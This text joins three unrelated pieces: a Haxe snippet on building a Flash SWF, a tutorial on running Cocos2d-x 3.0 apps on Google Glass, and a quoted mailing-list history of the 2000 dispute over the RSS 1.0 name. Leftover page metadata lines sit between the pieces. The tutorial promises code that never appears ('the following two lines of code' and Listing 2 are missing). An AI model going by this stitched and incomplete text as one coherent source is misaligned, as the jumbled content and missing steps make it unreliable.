compile.hxml. In this example the hxml file should be in the same directory as the example class.
-swf main-flash.swf -main Main -swf-version 15 -swf-header 960:640:60:f68712
The output will be a main-flash.swf with size 960x640 pixels at 60 FPS with an orange background color and a gray square in the center.
Run the SWF standalone using the Standalone Debugger FlashPlayer.
To display the output in a browser using the Flash plugin, create an HTML-document called
index.html and open it.
<!DOCTYPE html> <html> <body> <embed src="main-flash.swf" width="960" height="640"> </body> </html> | https://haxe.org/manual/target-flash-getting-started.html | CC-MAIN-2018-17 | refinedweb | 236 | 70.19 |
Porting, Creating and Running Cocos2d-x 3.0 Apps on Google Glass¶
Contributed By: jeffxtang
This tutorial first shows you how to port and run the Cocos2d-x 3.0 CppTest demo on Google Glass, and illustrates how to create and run a new Cocos2d-x 3.0 app on Glass.
Porting and Running the Cocos2d-x 3.0 Demo App on Google Glass¶
Below are the steps to run the sample C++ demo app that comes with the Cocos2d-x 3.0 on Mac:
1. Download and unzip the Android SDK (ADT bundle) at (Google Glass is based on Android);
2. Launch the Eclipse from the ADT bundle’s eclipse directory, then open Window > Android SDK Manager, install SDK Platform and Glass Development Kit Preview under Android 4.4.2 (API 19);
3. Connect your Google Glass and open Terminal, run <path-adt-bundle>/sdk/platform-tools/adb devices to verify that your Glass shows, or follow the Glass GDK Quick Start at;
4. Follow the how-to guide at to get the sample app cpp-tests built (note – you may need to run brew update before brew install ant). You can skip the section “How to deploy it on your Android phone via command line” in the guide above as we’ll import the project to Eclipse and install the app to Glass from Eclipse, but you may also want to test it on your other non-Glass Android device first to get the feeling how the demo runs.
5. Follow steps at to import the cpp-tests project and the libcocos2dx project to Eclipse.
6. Select the CppTests and Run it As Android Application with your Glass connected and turned on.
Unfortunately, tap or swipe left or right won’t navigation the demo menu. And what makes it worse is if your Glass screen goes off, tap on it again would you take to the “ok glass” home screen instead of this CppTests app. You can install the Launchy app () and use it to easily select the CppTests to run if the Glass goes off.
7. To enable user interaction for the CppTests on Glass, you need to first modify the class implementation in AppActivity.java file as shown in Listing 1.
// Listing 1. Enable and Pass Touch Event to Cocos2dx View on Glass public class AppActivity extends Cocos2dxActivity { Cocos2dxGLSurfaceView glSurfaceView; public Cocos2dxGLSurfaceView onCreateView() { glSurfaceView = new Cocos2dxGLSurfaceView(this); glSurfaceView.setEGLConfigChooser(5, 6, 5, 0, 16, 8); return glSurfaceView; } public boolean onGenericMotionEvent(MotionEvent event) { if ((event.getAction() & MotionEvent.ACTION_MASK) == MotionEvent.ACTION_POINTER_DOWN) { finish(); return true; } glSurfaceView.onTouchEvent(event); return false; } }
The changes are to make glSurfaceView, the view that shows each demo feature, an instance variable so in the GenericMotionEvent we can pass the touch event (except the double finger tap, which will finish the app) to the glSurfaceView.
8. To develop C++ code directly from Eclipse, we need to link the C++ source files in Classes directory to the CppTests’ Classes folder in Eclipse. To do this, open the project Properties, select C/C++ General, then Paths and Symbols, you’ll see a message “This project is not a CDT project” (CDT stands for C/C++ Development Tools).
To fix this, click Cancel in the Properties window. In Eclipse, select File ä New ä Project…, then select C/C++ ä C++ Project, enter a dummy project name and hit Finish. Now open the dummy project’s Properties ä Resource to find its location. On Terminal, copy the .cproject file from that location to your new game app’s proj.android directory (<path-to-cocos2d-x-3.0>/tests/cpp-tests/proj.android). You can delete the dummy project from both Eclipse and project contents on disk now.
9. Go back to CppTests Properties ä C/C++ General ä Paths and Symbols ä Source Location, click Link Folder..., check Link to folder in the file system, then Browse… and select the Classes folder of CppTests. Click OK twice, Eclipse will show all the source folders under Classes.
10. Next, we need to modify the AppDelegate.cpp file in the Classes folder. But as soon as you open the file, you’ll see lots of errors and you can’t build and install the CppTests on Glass anymore! This is because Eclipse, at least as of the ADT version 22.6.2, incorrectly shows the error in the CppTest project and lots of errors in the AppDelegate.cpp file.
To fix this, open the CppTests’s Properties window, then go to Code Analysis under C/C++ General, select Use project settings, and deselect Syntax and Semantic Errors – click OK and you’ll see errors are gone. This is important as otherwise you won’t be able to build the CppTests app from Eclipse after we make some C++ code change in Eclipse.
11. The changes we need to make to AppDelegate.cpp is pretty simple – inside the applicationDidFinishLaunching method, before return true; add the following two lines of code:
Then add #include "Box2DTestBed/Box2dView.h" in the beginning of AppDelegate.cpp. Now open a Terminal window, cd the cocos2d-x-3.0’s build directory, run the native C++ library build command:
python android-build.py -p 19 cpp-tests
After the “BUILD SUCCESSFUL” message, a new version of the CppTests library file, named libcpp_tests.so, will be available in the CppTests > libs > armeabi folder.
12. Now run the CppTests app again from Eclipse, you’ll see the CppTests’s Box2D sample running on Glass, and move your finger on the Glass touchpad you can see the box moved on Glass.
Ideally, we should be able to use gesture to go back to MainMenu and easily test all the other cool features of Cocos2d-x on Glass. It may quite likely come true by the time you read the book – if so, we’ll post the link to the updated tutorial on the book’s site. For now, you can use steps 11 and 12 above to experiment with all the other features demonstratred in the CppTests. For example, to check out how the ParticleTest runs on Glass, replace auto s = new Box2dTestBedScene(); with auto s = new ParticleTestScene(); in AppDelegate.cpp, add #include "ParticleTest/ParticleTest.h", build the C++ library, and run the CppTests app from Eclipse
After playing with CppTests, you should check out the Cocos2d-x Wiki and API References at for further info, before you start using it to build your next Glass game.
Now that you know how to run the demo CppTests on Glass, let’s see how you can create a new Cocos2d-x app running on Glass.
Creating a New Cocos2d-x App on Glass¶
Follow the steps below to create a Cocos2d-x app from scratch:
1. Follow the how-to guide at. To summarize, the commands I ran on my Mac are:
cd cocos2d-x-3.0 ./setup.py source ~/.bash_profile cocos new MyGame -p com.myCompany.myGame -l cpp -d ./MyCompany cocos run -s ./MyCompany/MyGame -p android
If you use Windows or Linux, you can use similar commands.
2. In Eclipse, import the Android project located at MyCompany/MyGame/proj.android. After importing, if you see errors on the MyGame project and the AppActivity.java, you need to fix the reference to the libcocos2dx: open the project’s Properties, go to Android’s Library section, click Add… and then select the libcocos2dx there.
3. Run the MyGame app on your Glass and you’ll see the Cocos2d-x version of Hello World on Glass.
4. If you click the Classes folder, which should contain all the C++ code for the game app, you’ll see it’s empty, but it’s located at MyCompany/MyGame, at the same level as the proj.android directory. We need to link the Classes directory to the MyGame’s Classes folder in Eclipse, as we did for the CppTests demo, in step 8 of the last section – in Eclipse, select File > New > Project…, then select C/C++ > C++ Project, enter a dummy project name and hit Finish. Now open the dummy project’s Properties ä Resource to find its location. On Terminal, copy the .cproject file from that location to your new game app’s proj.android directory (MyCompany/MyGame/proj.android).
Now go back to MyGame’s Properties ä C/C++ General ä Paths and Symbols ä Source Location, click Link Folder..., check Link to folder in the file system, then Browse… and select the Classes folder of MyGame, click OK.
5. If and only if you open AppDelegate.cpp file in Classes, you’ll see lots of errors. To fix this, follow Step 10 in the last section.
6. Now open AppActivity.java and make its content to be like Listing 1. Then open HelloWorldScene.cpp, add the following code, most of which borrowed from, but with some fixes, to the end of the HelloWorld::init() method, before return true; as shown in Listing 2.
That's all the code change you need to make.
7. Open a Terminal window, cd MyGame’s proj.android directoty, run the “python build_native.py” command, you should see messages as follows:
[armeabi] Compile++ thumb: cocos2dcpp_shared <= HelloWorldScene.cpp [armeabi] SharedLibrary : libcocos2dcpp.so [armeabi] Install : libcocos2dcpp.so => libs/armeabi/libcocos2dcpp.so
We're all set.
8. Back to Eclipse, run the MyGame app on Glass. This time, you can move around the image on the top on the Glass touchpad.
If you have any Cocos2d game development background, or even if you don’t, you can come up to speed with Cocos2d-x quickly – it has well documented online resources and examples. What I hope to offer here is to show you how to run the engine and samples on Google Glass and interact with the engine, so you can see the possibility and potential of using the great engine for your next Glass game project – to get inspired, take another look at many great games developed with the engine at. | http://cocos2d-x.org/wiki/User_Tutorial-Porting_Creating_and_Running_on_Google_Glass | CC-MAIN-2017-30 | refinedweb | 1,665 | 72.05 |
Ive created a console program that works. The program launches and asks for the user to input values for the player class.
Then I initialize a list of Monster classes and have values entered into the method to create each monster. But I am receiving an error after the program runs claiming the index value may be overloaded. w/e that means.
List<Monster> monsterlist = new List<Monster>(); monsterlist[0].CreateMonster("Goblin", 4, 4, 4, 1); monsterlist[1].CreateMonster("Wolf", 2, 2, 2, 1);
This is my list and the values used. I run it and then...
"ArgumentOutOfRangeException was handled
Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index"
pops up highlighting the line..
monsterlist[0].CreateMonster("Goblin", 4, 4, 4, 1); -- Thats the problem. I have no idea what im doing wrong even after reading the help files. I will conclude with the code of the Monster class. Thanks for the help!
public class Monster { private string Name = "Monstername"; private int Damage = 1; private int Delay = 1; private int Atk = 1; private int Treasure = 0; public Monster() { } public void CreateMonster(string name, int damage, int delay, int atk, int treasure) { SetName(name); this.Damage = damage; this.Delay = delay; this.Atk = atk; this.Treasure = treasure; } public void SetName(string n) { this.Name = n; } }
the files are in the same namespace. | https://www.daniweb.com/programming/software-development/threads/209986/list-exemption-issue-with-index | CC-MAIN-2018-43 | refinedweb | 231 | 70.29 |
23 November 2011 21:47 [Source: ICIS news]
(updates with Canadian and Mexican chemical railcar traffic data)
TORONTO (ICIS)--Chemical shipments on Canadian railroads rose 2.3% year on year in the week ended on 19 November, rebounding after two declines in a row, according to data released by an industry association on Wednesday.
Canadian chemical railcar loadings for the week totalled 10,458, up from 10,225 in the same week a year earlier, the Association of American Railroads (AAR) said.
The previous week ended 12 November saw a year-on-year decline of 8.0% in Canadian chemical railcar shipments, marking the fifth decline so far this year.
The weekly chemical railcar loadings data are seen as an important real-time measure of chemical industry activity and demand. ?xml:namespace>
Year to date to 19 November, Canadian chemical railcar shipments were up by 9.2% to 511,901.
The AAR said chemical railcar traffic in
Year to date to 19 November, Mexican chemical railcar shipments were up by 6.6% to 54,144.US chemical railcar traffic rose 1.4% year on year for the week ended 19 November, rebounding from a decline in the previous week
There were 28,928 chemical railcar loadings last week, compared with 28,528 in the same week in 2010.
In the previous week, ended 12 November, US weekly chemical railcar traffic fell by 2.1% year on year, marking its fourth decline so far this year.
Meanwhile, overall US weekly railcar traffic for the 19 high-volume freight commodity groups tracked by the AAR rose by rose by 1.1% year on year, to 301,919 carloads. | http://www.icis.com/Articles/2011/11/23/9511071/canada-weekly-chemical-railcar-traffic-rises-2.3.html | CC-MAIN-2014-52 | refinedweb | 276 | 55.34 |
So this is very much an outsider’s history, and like any history, it is necessarily biased, selective, and incomplete.
6/28/2000. Eric van der Vlist: Will RSS fork?
Following a thread on the syndication mailing list, Rael Dornfest has announced an “RSS Modularization Spec(ish) page” defining how RSS could be extended using namespace based modules.
7/5/2000. Leigh Dodds: RSS Modularization
Perhaps the key benefit of RSS is its simplicity. The syntax for the format is easy to understand, and there are only a few self-explanatory tags to learn. This makes RSS files relatively trivial to produce. Dave Winer of Userland has recently added some new online documentation for RSS 0.91, adding historical notes as well as capturing details of its common usage patterns.
Developers on the RSS and Syndication mailing lists are now discussing future directions for RSS, the hope being to build on current successes and provide richer functionality.
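(An editorial aside for readers unfamiliar with the format under discussion: RSS 0.91 really is this small. The sketch below — a made-up feed, not taken from any quoted message — shows the handful of self-explanatory tags Dodds is referring to, and how little standard-library code a reader needs.)

```python
# A minimal RSS 0.91 feed (hypothetical content) and the few lines
# of standard-library code needed to read it.
import xml.etree.ElementTree as ET

FEED = """<rss version="0.91">
  <channel>
    <title>Example News</title>
    <link>http://news.example.com/</link>
    <description>A hypothetical channel.</description>
    <item>
      <title>First headline</title>
      <link>http://news.example.com/1</link>
    </item>
  </channel>
</rss>"""

channel = ET.fromstring(FEED).find("channel")
print(channel.findtext("title"))  # Example News
for item in channel.findall("item"):
    # Each item is just a title and a link -- nothing to study up on.
    print(item.findtext("title"), item.findtext("link"))
```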
8/14/2000. Rael Dornfest: RSS.
Interested parties are invited to join a working group on the newly-created RSS-DEV mailing list at:
8/16/2000. Aaron Swartz: Re: Thoughts, questions, and issues
[addressing Dave Winer] If I understand you correctly, you want to create a set of elements for RSS that are widely supported and you’re free to do that. Just create your own namespace and tie it into the proposal. You say namespaces are confusing, but I have to disagree with you there. When used properly, they can actually make XML easier to understand.
… RSS is now (or once again) an RDF format, which has its benefits and drawbacks. It does make RSS more complicated, which is a downside. However, as R.V. Guha pointed out to me, you can easily escape from RDF if you don’t like it by using the rdf:parseType=”literal” attribute. Again, I think this is likely a best-of-both-worlds move.
8/16/2000. Dave Winer: Re: Thoughts, questions, and issues #2
So, Aaron, because we disagree you get to make the rules?
So sad it comes to this. If you’d stop and think you’d realize there’s a win-win here, all it takes is a little listening and considering other points of view.
So sad, because there will be two RSS 1.0s.
So confusing, so embarassing.
(And a waste of time!)
See you in the market.
8/16/2000. Paulo Gasper: Re: Thoughts, questions, and issues #2b
Hi Dave,
Your statement (above) works both ways.
IMHO, Aaron even gave an example to illustrate why he thinks that way. It seems to me that he is trying to reason over that. Not forcing.
8/16/2000. Dave Winer: Re: Thoughts, questions, and issues #2c
Paulo, the force comes from the choice of the RSS 1.0 name. Doesn’t leave much wiggle room.
8/16/2000. Dave Winer: Re: Thoughts, questions, and issues #3. (Note: here Dave is not replying to Aaron’s messages quoted above, but to someone else entirely.)
That’s fine. But I’m going to keep going. I’m tired of debating this stuff. I’ve been having a lot of fun in the last couple of months, and it’s only been in the last few days that it started to turn into the usual hand-wringing, trying to keep you from hearing things that apall you. Enough is enough. These guys want to own RSS. I put a ton of work into it. Somehow reconcile that with your appalled-ness. This is not a nice thing that’s going on. I’m apalled.
8/16/2000. Paul Freeman: The RDF approach needs to answer some valid criticism
- To enable the average developer to cope, a syndication format must be simple to create and be easily read by a human. The rdf approach requires too much studying and background knowledge to easily pick up and is too hard for humans to read and create manually.
- RSS should also be easy to parse and create using any software environment which developers care to use. Some software environments are too weak to handle RDF and the namespace syntax.
… If the RDF approach is to be widely accepted and adopted then 1) and 2) require solutions. Not all of them may be technical, but better software tools support is part of a solution which does not require the simple syntax required by the “expanded core”. This software tools support should span *all* of the environments which people need to use… and we shouldn’t sneer at people who try to parse this stuff in Perl, VB or even, shock horror, Macromedia Flash.
8/17/2000. Paulo Gasper: Re: Thoughts, questions, and issues #4
That seems to be the main problem: RDF focus.
RSS became a popular format with people that couldn’t care less about RDF. The value of RSS is that popularity.
There are a lot of private little “RSS processors” and this [proposed RSS 1.0] standard does not care much about them.
8/20/2000. Aaron Swartz: Re: Thoughts, questions, and issues #5
I think the answer from the RSS-DEV people (I’m sort of guessing, correct me if I’m wrong) is that the writers shouldn’t have to understand the spec – they should be able to use tools that will generate the RSS for them.
… The fact is, as far as I’m concerned, nobody but the programmers should have to deal with these specs. There seems to be a lot of confusion here, that RSS files are meant to be written by hand. Perhaps that was true with the old spec, but it doesn’t need to be, and is even less true with the new one. The specs are written for programmers, to allow them to write programs that communicate.
… so that you don’t have to generate the RSS file by hand, you can convert to it or do it through a web interface. If you still have trouble, let us know, we’re here to help, not to scare.
8/20/2000. Lynn Siprelle: Re: Thoughts, questions, and issues #6
[addressing Aaron] I have nothing but respect for you, *believe* me, but this is just a little too close to “don’t worry your purty li’l head about it, missy.”
OK, fine, so I can find some tool somewhere to generate the RSS file for me. But what if I want to parse one, which I will? I *still* have to understand the spec, and I don’t. And I’m neither stupid nor technically illiterate.
… It’s not just the simple writers you’ll need to worry about. It’s the simple webmasters who are doing things with RSS files now and who will get tripped up by these changes. If you’ve ever done tech support (and I have) you know that there are all kinds of people out there doing this stuff–brilliant kids like Aaron and old duffers who just wanna put up photos of the grandkids, and everyone in between.
8/20/2000. Aaron Swartz: Re: Thoughts, questions, and issues #7
[addressing Lynn] Oh, I definitely know what you mean. But here’s how I see it:
Writers:
- Use an automated RSS creator
- Use a web-based RSS creator with a nice interface
- Use a converter from the simple format to the more complex
Readers:
- Use a pre-built RSS parser (like XML::RSS for Perl)
- Use a down-converter to a simpler format
- Ignore the new additions and just use the old stuff
8/21/2000. zac: Re: Thoughts, questions, and issues #8
[addressing Aaron] These sorts of assumptions are self fulfilling to a degree. If you write a spec assuming that some users won’t interact with it then they won’t.
This limits the number of people that will use the format.
People want to (and should) understand the technologies that they use. So when you build a format that puts required namespace declarations in the <channel> tag then I think you’ve gone down a path that isn’t going to be followed by as many people.
8/21/2000. Aaron Swartz: Re: Thoughts, questions, and issues #9
I maintain that the new [proposed RSS 1.0] spec is for more technical usage than the older one. For real heavy-duty use, it will require some understanding of XML and RDF. The benefit from this is more power, but at the expense of some clarity and simplicity. I see RSS as moving away from a simple XML language for the people, and more towards a communication system for content management systems and other scripting environments. It may not be the choice you believe in, but it’s a choice that the authors are making. There will always be other formats if you don’t agree.
8/24/2000. Dan Libby: RSS: Introducing Myself
I was the primary author of the RSS 0.9 and 0.91 spec and the architect behind the My Netscape Network (a separate project from My Netscape, which I also worked on). I left Netscape in 1999, in part because of what I felt was mis-handling (non-handling?) of RSS and the MN platform. I fully expected the format to die an ignominious death, and I was pleasantly surprised recently to poke my head out of the sand and find so many people still using it. I am glad that the net community has begun adopting RSS, and would like to see it realize the original vision.
The original My Netscape Network Vision:
We would create a platform and an RDF vocabulary for syndicating metadata about websites and aggregating them on My Netscape and ultimately in the web browser. Because we only retrieved metadata, the website authors would still receive user’s click-throughs to view the full site, thus benefitting both the aggregator and the publisher. My Netscape would run an RDF database that stored all the content. Preferences akin to mail filters, would allow the user to filter only the data in which they are interested onto the page, from the entire pool of data. For example, a user interested in articles about “Football” would be able to setup a personalized channel that simply consisted of a filter for Football, or even for a particular team or player. Or for all references to Slashdot.org, or whatever. This fit our personalization scheme well, and would (I hoped) give us the largest selection of content, with the greatest degree of personalization available. Tools would be made available to simplify the process of creating these files, and to validate them, and life would be good.
What Actually Happened:
- A decision was made that for the first implementation, we did not actually need a “real” RDF database, which did not even really exist at the time. Instead we could put the data in our existing store, and instead display data, one “channel” at a time. This made publishers happier anyway, because they would get their own window and logo. We could always do the “full” implementation later.
- The original RDF/RSS spec was deemed “too complex” for the “average user”. The RDF data model itself is complex to the uninitiated, and thus the placement of certain XML elements representing arc types seemed redundant and arbitrary to some. Support for XML namespaces was basically non-existent. My (poor) solution was to create a simpler format, RSS 0.9, that was technically valid RDF, but dropped namespaces and created a non-connected graph. … This marked the beginning of the Full Functionality vs Keep It Simple Stupid debate that continues to this day. …
- We shipped the first implementation, sans tools. Basically, there was a spec for RSS 0.9, some samples, and a web-based validation tool. No further support was given for a while…
- At some point, it was decided that we needed to rev the RSS spec to allow things like per item descriptions, i18n support, ratings, and image widths and height. Due to artificial (in my view) time constraints, it was again decided to continue with the current storage solution, and I realized that we were *never* going to get around to the rest of the project as originally conceived. At the time, the primary users of RSS (Dave Winer the most vocal among them) were asking why it needed to be so complex and why it didn’t have support for various features, eg update frequencies. We really had no good answer, given that we weren’t using RDF for any useful purpose. …
- We shipped the thing in a very short time, meeting the time constraints, then spent a month or two fixing it all. :-) …
- People on the net began creating all sorts of tools on their own, and publishing how-to articles, and all sorts of things, and using it in ways not envisioned by, err, some. And now we are here, debating it all over again.
8/25/2000. O’Reilly Network: Open Source Roundtable: Radio show on RSS 1.0
O’Reilly Network publisher Dale Dougherty talks with some of the core developers behind the new spec for RDF Site Summary (RSS 1.0) about the background behind RDF, the need for a standard, and what RSS enables. (downloadable as MP3 (10MB), or as RealAudio stream)
8/26/2000. Dave Winer: Comments on O’Reilly radio show on “RSS 1.0″
The format and process they describe are highly complex. They are over-estimating content people’s technical sophistication and interest in working on new formats.
IMHO, the new format should not be called RSS. There’s been a fork, and the peaceful solution is to each go our own way. Calling their spec RSS is unfair. We never considered moving RSS forward without getting O’Reilly on board first. RSS 1.0 was a surprise, we found out when the spec went public. I’ve said this over and over to the O’Reilly people, I would wish them godspeed if they hadn’t called it RSS. Should we call our spec RSS 1.0 too?
BTW, it was Netscape’s decision to take the RDF out of RSS, one we heartily supported. We considered calling it Really Simple Syndication. That’s the core thing about RSS, simplicity, it’s almost an end-user format, easily explained in a four-screen spec designed for people who understand HTML and not much more. Once Guha left, Netscape totally dropped the RDF pretense. Now it’s back.
8/26/2000. Aaron Swartz: Re: Commentary: RSS Roundtable
[re: complexity] Once again, content people can use the tools that we’re creating to convert from simpler formats and write files through a Web interface.
[re: "RSS 1.0" naming] Hmm, perhaps we should consider changing the name. The problem is that many of us have so much invested in the current name, making it painful to change it. Having two RSS 1.0′s would be even more confusing. I think the name is also deserved, considering the large amount of work spent on making the new spec backwards-compatible with RSS 0.9. It would be different if their we were creating a radically new spec, but we’re not — instead we’re simply adding namespaces and more RDF support to an already existing spec.
[re: simplicity] We disagree on the importance of simplicity. Yes, I like simplicity, but it needs to be balanced. I don’t think that’s the core thing about RSS, I think the core thing about RSS is what it stands for: RDF, sites and summaries.
9/2/2000. Dave Winer: What to do about RSS?
I wish it had turned out this way, then the people who legitimately want to do a Namespaces-and-RDF syndication format would have to choose another name. To their credit, the water is muddied by the departure of Netscape from the process. So there’s now an identity crisis, what is RSS, and who, if anyone, has the right to evolve it?
I think the answer to this question is totally obvious. But as one of the parties to the dispute it’s not up to me to say what it is.
9/4/2000. Ken MacLeod: Re: What to do about RSS
[addressing Dave] From my pov, that the new proposal, by the majority of developers, be “RSS 1.0″ seemed so obvious that it wasn’t until you objected so vehemently that it even crossed my mind.
9/4/2000. David McCusker: Re: TBL
[addressing Dave] I’m not directly involved. In fact I don’t want to be involved. :-) But it’s clear to me you were dispossessed by the naming, and very intentionally so by the folks who chose the name. I’m sensitive to nuances in dispossession.
… Only two main things matter in gauging your dispossesion. First, you were a voluntary party to an earlier version of RSS with certain characteristics. Second, you were involuntary party to the re-use of the old name for a new (but somewhat related) version with strikingly different technical characteristics. Case closed. They owe you. If they don’t pay, then they suck.
9/4/2000. Ken MacLeod: Re: TBL #2
It has been suggested that both forks use a different name.
9/4/2000. David McCusker: Re: RSS name cutting and drying
[addressing Ken] I’d noticed a pronounced absense of negotiation over the naming problem, as if the folks who came up with the proposed RSS 1.0 had responded to Dave by asking coldly, “Who are you, again?” It was the coldness that had a really bad feel to it, provoking my ire.
By the way, you’re doing a fine and human job of discussing the issue in a style I think is very nice. I only really think more responsiveness is required from the RDF+NS folks. The apparent “I don’t know you” reaction suggests bad faith, which folks should scramble to avoid.
[re: "it has been suggested that both forks use a different name"] That’s fair if there are actually two new evolving specs, if both sides agree to sign off. It only seems wrong if one side chooses unilaterally, especially if seeming to arrogate sole ownership to itself. It’s better to part ways amicably than to dump an inconvenient past partner. Folks who dump others inspire less future trust.
9/11/2000. USPTO: Trademark application #78025336: RSS
Mark (words only): RSS
Current Applicant: Userland Software
Filing Date: 2000-09-11
Current Status (2001-12-26): Abandoned: Applicant failed to respond to an Office action.
9/12/2000. Dave Winer:
Recently I have had a standard that I co-authored stolen by a big name, totally brazen, and I’ve said Fuck This many times in the last few weeks, and it hasn’t done any good.
9/13/2000. Dan Brickley: Re:.
9/13/2000. Dan Brickley: Re: #2
You’re mad at us because you think we stole your vision and corrupted it.
I’d like you to stop with the accusations of theft. Last I heard from you on that topic, you still claimed we were thieves. It’d be really nice to hear that retracted.
9/13/2000. Dave Winer: Re: #3
I will retract the statement after the name is changed to something other than RSS 1.0. Until then, however reluctantly, I will stand by the statement I made on the decentralization list, in the context it was posted.
My company has big plans for RSS, and they don’t include advising developers to do namespaces and RDF.
9/13/2000. Dan Brickley: Re: #4
Is it true that the *only* thing that you feel we have stolen is the name. No ideas, no technology, no designs were stolen, just the letters ‘R’,'S’,'S’. Rich Site Summary. RDF Site Summary. Real Simply Syndication. Really silly squabbles…
9/13/2000. Dave Winer: Re: #5
Dan here’s what was stolen.
Before the namegrab I had some influence on and participation in the evolution of RSS.
After the grab, I have no say in its future. I’m reduced to trying to talk you out of the namegrab. I’ve put so many weeks into just doing that. Here’s what it comes down to:
My choice is to accept your version or..?
What if I think it’s wrong? What then?
The provocative act was to take the name of something that exists and put it on something new.
You may not agree, and I don’t want to debate all this *yet again* but that’s what I lost in this and it’s not fair. I worked hard to get RSS to where it is now. Lots of months, down the drain. Why? Why do you want me to go away? What the hell did I ever do to you?
9/13/2000. Dave Winer: Greetings Syndicators!
I’d like to find out if there’s interest here in working beyond RSS 0.91, adding a few features possibly, new docs and howtos, or sample code, or just asking questions about how people do stuff.
… We might even rename our work something like RSS-Classic, so the people who want to own RSS can have their way.
9/20/2000. Tim O’Reilly: Re: Asking Tim
Speaking of RSS, here’s my read on what happened. (I wasn’t directly involved.) The only connection I can see is that the O’Reilly Network ran a series of ads on our sites promoting its stories about the RSS 1.0 spec (just as it promotes other stories on O’Reilly Network sites). Dave never approached me directly to express a point of view such as “I think the RSS spec is going in the wrong direction. Is there anything you can do to help get my point of view across to the other developers?” Instead, the first I heard of it was a series of public accusations that my company was leading a conspiracy to steal “Dave’s” standard.
9/20/2000. Dave Winer: Re: Asking Tim #2
9/21/2000. Tim O’Reilly: Re: Asking Tim #3
As I understand it, it was public knowledge (or certainly your knowledge) that there was work going on on a spec to extend RSS. When it was published, it was published as a “proposed RSS 1.0 spec”, and that seems completely legitimate to me, whether or not the work to develop it was done in public or private. The dozen people who worked on it have enough history with RSS to propose anything they like. You personally urged Rael to start the effort to write up what he was thinking as a proposed spec. And a “proposed RSS 1.0 spec” seems like as good a description as any for what they had come up with.
It seems to me that you immediately hardened the battle lines, and started crying foul, when you should instead have said: “I don’t think that this is the right direction for RSS 1.0.” If you’d kept yourself to technical substance instead of vague (and incorrect) accusations of plots masterminded by O’Reilly, this whole contretemps could have been avoided.
As Lao Tzu says, “He who feels pricked, must first have been a bubble.” I believe it was your power grab to unilaterally rewrite the RSS 0.91 spec with a Userland copyright that actually started this whole thing. You were moving to claim RSS as “yours” and a group of other developers put an oar in, and you didn’t like it.
… By any outside reading, your claim to have “created” RSS has no basis. Dan Brickley’s posts to FoRK, the first of which I linked to above, make that fairly clear. Netscape created it, but even then, it is so similar to other things available at the time from a number of players, including Microsoft, that anyone’s claim to ownership are pretty thin. Netscape created the name, and that’s about as close as you can get. You certainly did a lot of work to popularize and support it.
9/21/2000. Dave Winer: Re: Asking Tim #4.
9/21/2000. Tim O’Reilly: Re: Asking Tim #5.
10/12/2000. Ken MacLeod: Re: RSS History
The way that the W3C and the IETF do it is to have working groups. Working groups are made up of people who are knowledgable of the subject (experienced users as well as developers) and are willing to extend the effort to participate in the working group. It is highly regrettable that the decision to form a working group was made only after the RSS 1.0 proposal.
… I can think of no other project or technology that went through a set of circumstances similar to this.
10/12/2000. Dave Winer: Re: RSS History #2
Thanks for the help Ken.
So I guess it would be fair to say that if an outsider looked at this, that there is no precedent for the transition that took place here, this is not how open source projects or W3C or IETF projects fork.
Some people have said that the community decided to go in the direction of Namespaces and RDF, but it’s clear that that did not actually happen.
10/13/2000. Ken MacLeod: Re: RSS History #3
Right, I don’t recall ever seeing anything like this before.
[re: community support] It’s clear that it was not a unanimous decision, yes.
10/13/2000. Dave Winer: Community consensus
The claim has been made, offlist, that there was a community consensus to move to namespaces and RDF and modules. If there was such a consensus, now is the time to show where the record of that is. Ken provided a pointer, but it’s not what I asked for, because no one asked “Is it OK if we call this RSS 1.0?”
The great thing about eGroups is that no one can tamper with the record. If there was a consensus, it *must* be evident here. I went to the trouble to read the archives over the summer. There isn’t that much to read. I found no evidence that the question was ever asked on this list. I know for a fact that I was never asked to vote on the transition, and I don’t think the general membership of this list was asked either.
10/15/2000. Seth Russell: Re: [syndication] changing the name of RSS
I propose that we change the name because it would:
- help heal the rift with Dave Winer,
- encourage a new attitude towards this revolutionary RDF Metadata Feed; and
- [as you indicate] clear up the confusion in the marketplace if the syndication group moves ahead with RSS 9+.
Are there any valid arguments against changing the name?
10/15/2000. Paulo Gaspar: RE: [syndication] changing the name of RSS #2
Yes, changing the name of the RSS 1.0 to something else is what makes more sense – it is the for with the most diferences from the previous version.
10/17/2000. Paulo Gaspar: RE: [syndication] Total confusion in RSS-Land
The only problem I see with your arguments is that you never talk about FORKing, giving another name to RSS 1.0. Both groups could “live amicably” if the “1.0″ group would just agree on that.
… And it makes sense. Even if you do not understand why other people find the RDF solution complex, they still DO. And RSS 0.92 will be much closer to 0.91 than 1.0 is. Is up to 1.0 to get another name.
10/17/2000. Seth Russell: Pick a new name for RSS 1.0
It has been suggested by Dave Winer and others that it is inappropriate to name our standard RSS 1.0. To clear up the confusion that most certainly will emerge in the market place and to give this format a new revolutionary start, it seems appropriate to also give it a new name.
10/18/2000. Jeff Bone: Forking, the name game, the politics of naming
We all seem to acknowledge that there’s too much ideological distance between the camps to reasonably work on a single effort, and therefore forking is inevitable. The controversy is purely on which effort — the new and improved and totally revised and overly complexified effort or the brutally simple incremental improvement effort — gets to keep using the RSS name. Given that the original stakeholders are in favor of the simpler version, IMO they should get to keep the name.
10/19/2000. Mark Ketzler: Re: Forking, the name game, the politics of naming
RSS existed and was being used by lots of folk
Group A (including some of the RSS originators) wanted to make RSS extensible etc.
Group B (including rest of the original group) wanted status quo
This is a fork by Group A. Why should Group B change the name of something that existed. How do you defend this? If the RSS-DEV WG is so concerned about the RSS brand why are you tarnishing it with this name grab?
11/7/2000. Dan Brickley: RSS-Classic, RSS 1.0 and a historical debt
Contrary to what you might hear, the RSS 1.0 proposal did not come from a bunch of outsiders who swooped in and grabbed the prestigious acronym ‘RSS’. RSS 1.0 as proposed is solidly grounded in the original RSS vision, which itself had a long heritage going back to MCF (an RDF precursor) and related specs (CDF etc). This can be seen for example from Guha’s longstanding involvement, and Dan Libby’s account of the Netscape RSS work and endorsement of the 1.0 proposal.
… I believe we have more than adequate historical justification for calling the ‘new’ stuff RSS. To defend this observation requires pointing to a bunch of historical baggage that I’ve previously avoided publicising.
… On the basis of these various observations, we have two traditions, both rooted in Guha’s MCF work.
MCF > CDF > scriptingNews > RSS 0.91 > RSS-Classic
MCF > XML-MCF > RSS 0.90 > RSS 1.0
… To stress my point once more. The RSS 1.0 proposal did not appear from out of nowhere, but is routed in 5 years work in this area. The RSS 1.0 proposers did not swoop in from nowhere to steal the ‘RSS’ acronym.
